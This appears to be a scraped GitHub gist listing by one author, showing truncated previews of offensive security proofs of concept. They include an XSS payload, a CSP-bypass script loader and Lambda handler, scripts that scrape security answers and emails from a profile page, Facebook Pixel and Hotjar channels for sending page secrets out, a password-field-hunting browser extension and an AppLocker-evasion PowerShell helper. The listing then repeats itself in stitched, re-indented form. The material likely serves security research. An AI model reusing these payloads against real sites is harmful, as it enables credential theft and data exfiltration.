Felipe Molina felmoltor

## Search-Writable.ps1
# Author: Felipe Molina de la Torre
# Date: Novermber 2023
# Summary: Accessckl-like script, but without using external executable files like "accesschk.exe".
# It shows you the folders and executables where your user have write permissions and why.
# This is useful for systems where AppLocker is in place and you cannot execute arbitrary exes but you can execute PowerShell.

# Class to store permissions
class Permissions {
    [string]$GroupName
    [string]$SID

## secret.php
// GET /secret.php?msg=This%20is%20an%20error";alert("hello%20xss");var%20foo="var

// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
  function displayError(){
    document.getElementById('error-div').innerText="Error 1005: This is an error";alert("Hello xss");var foo="var";
  }
  displayError();
</script>
// […]

## secret.php
// GET /secret.php?source=js/debug.js

// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
  const urlParams = new URLSearchParams(window.location.search);
  const source = urlParams.get('source');
  var s=document.createElement("script");
  s.src=source;
  document.head.appendChild(s);
</script>

## secret.php
<?php

if (isset($_GET["msg"])){
    $errorMsg = "Error 1005: ".$_GET["msg"];
}
else{
    $errorMsg="";
}

?>

## Lambda-csp-bypass-code.js
'use strict';
export const handler = async (event) => {
    const response = {
        statusCode: 200,
        headers: {
            'Content-Type': 'text/html',
        },
        body: event.queryStringParameters.data,
    };
    var decoded=Buffer.from(event.queryStringParameters.data, 'base64').toString('ascii');

## PoC-CSP-Bypass-pwn.js
fetch('/profile.php').then(function (response) {
  return response.text();
}).then(function (html) {
  // This is the HTML from our response as a text string
  const parser = new DOMParser();
    const pd = parser.parseFromString(html, "text/html");
    sq=pd.getElementById('security_question').value;
    sa=pd.getElementById('security_answer').value;
    email=pd.getElementById('email').value;
    username=pd.getElementById('username').value;

## Facebook-exfil-csp.js
fbq('init', '1179785999289471');
fbq('trackCustom', 'MyEvent-keyfc',{
    data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"
});

## Hotjar-poll-answer.js
fetch('/profile.php').then(function (response) {
    return response.text();
}).then(function (html) {
    // This is the HTML from our response as a text string
    const parser = new DOMParser();
    const pd = parser.parseFromString(html, "text/html");
    sq=(pd.getElementById('security_question')).value;
    sa=(pd.getElementById('security_answer')).value;
    var data = {"utk":null, "response_content":"{\"version\":4 ,\"answers\":[{\"questionUuid\":\"78942292\"
                ,\"answer\":\"Something else\",

## smol-hello.js
console.log("Hello from a gist file hosted in felmoltor's github");

## background.js
// TODO: Find all the fields that might be a password field.
// for now, we can do it only for a input field with id "password"

console.log("RAM extender is looking around.");

chrome.runtime.onMessage.addListener(
  function(request, sender, sendResponse) {
    console.log(sender.tab ?
                "from a content script:" + sender.tab.url :
                "from the extension");
	# Author: Felipe Molina de la Torre
	# Date: Novermber 2023
	# Summary: Accessckl-like script, but without using external executable files like "accesschk.exe".
	# It shows you the folders and executables where your user have write permissions and why.
	# This is useful for systems where AppLocker is in place and you cannot execute arbitrary exes but you can execute PowerShell.

	# Class to store permissions
	class Permissions {
	[string]$GroupName
	[string]$SID
	// GET /secret.php?msg=This%20is%20an%20error";alert("hello%20xss");var%20foo="var

	// […]
	<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
	function displayError(){
	document.getElementById('error-div').innerText="Error 1005: This is an error";alert("Hello xss");var foo="var";
	}
	displayError();
	</script>
	// […]
	// GET /secret.php?source=js/debug.js

	// […]
	<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
	const urlParams = new URLSearchParams(window.location.search);
	const source = urlParams.get('source');
	var s=document.createElement("script");
	s.src=source;
	document.head.appendChild(s);
	</script>
	<?php

	if (isset($_GET["msg"])){
	$errorMsg = "Error 1005: ".$_GET["msg"];
	}
	else{
	$errorMsg="";
	}

	?>
	'use strict';
	export const handler = async (event) => {
	const response = {
	statusCode: 200,
	headers: {
	'Content-Type': 'text/html',
	},
	body: event.queryStringParameters.data,
	};
	var decoded=Buffer.from(event.queryStringParameters.data, 'base64').toString('ascii');
	fetch('/profile.php').then(function (response) {
	return response.text();
	}).then(function (html) {
	// This is the HTML from our response as a text string
	const parser = new DOMParser();
	const pd = parser.parseFromString(html, "text/html");
	sq=pd.getElementById('security_question').value;
	sa=pd.getElementById('security_answer').value;
	email=pd.getElementById('email').value;
	username=pd.getElementById('username').value;
	fbq('init', '1179785999289471');
	fbq('trackCustom', 'MyEvent-keyfc',{
	data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"
	});
	// TODO: Find all the fields that might be a password field.
	// for now, we can do it only for a input field with id "password"

	console.log("RAM extender is looking around.");

	chrome.runtime.onMessage.addListener(
	function(request, sender, sendResponse) {
	console.log(sender.tab ?
	"from a content script:" + sender.tab.url :
	"from the extension");